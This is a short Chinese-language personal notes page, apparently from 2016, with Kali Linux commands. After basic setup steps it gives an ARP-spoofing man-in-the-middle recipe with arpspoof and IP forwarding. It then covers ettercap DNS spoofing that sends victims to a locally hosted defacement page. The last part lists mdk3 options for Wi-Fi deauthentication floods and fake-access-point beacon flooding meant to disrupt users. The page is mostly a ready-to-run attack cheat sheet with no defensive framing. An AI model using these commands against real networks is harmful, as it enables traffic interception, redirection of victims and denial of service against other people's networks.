Skip to content

kali的一些记录 偏无线

字数
417 字
阅读时间
2 分钟
更新日期
10/13/2016
ssh:/etc/init.d/ssh start #start ssh then logout 开启SSH 
leafpad /etc/apt/source.list //修改kali 更新源
apt-get update //更新  
apt-get dist-upgrade //安装更新  
apt-get install fcitx fcitx-googlepinyin //安装中文输入法 
nmap -sP 192.168.0.0/24 //查找网段类存活主机 
echo 1 >/proc/sys/net/ipv4/ip_forward  
arpspoof -i etho -i 192.168.1.100 192.168.1.1 //第一个IP是目标IP 第二个是网关IP

修改ettercap DNS文件。
文件目录:/etc/ettercap/etter.dns
用记事本打开它。
ctrl+f 搜索
关键字:# redirect it to http://www.linux.org

在终端输入/etc/init.d/apache2 start
来启动apache2 也就是网页服务器
apache2的根目录是/var/www 修改一下index.html 改成黑页

在终端输入ettercap -G来进入ettercap的图形界面

//无线wifi相关 

![Image \[1\].png](assert/45a01476365500.png)

airmon-ng start wlan0   
airodump-ng mon0 //获取wifi 

//无线攻击 mdk3  
  
mdk3 mon0 d  
      -w <filename>             #白名单mac地址列表文件  
      -b <filename>              #黑名单mac地址列表文件  
      -s <pps>                        #速率,这个模式下默认无限制  
      -c [chan,chan,chan,...]                  #信道,可以多填,如 2,4,5,1

方法三:伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋

mdk3 mon0 b  
      -n <ssid>        #自定义ESSID  
      -f <filename>            #读取ESSID列表文件  
      -v <filename>           #自定义ESSID和BSSID对应列表文件  
      -d       #自定义为Ad-Hoc模式  
      -w         #自定义为wep模式  
     -g        #54Mbit模式  
     -t   # WPA TKIP encryption  
     -a #WPA AES encryption  
      -m #读取数据库的mac地址  
      -c <chan> #自定义信道  
      -s <pps> #发包速率  
mdk3 –help b #查看详细内容

撰写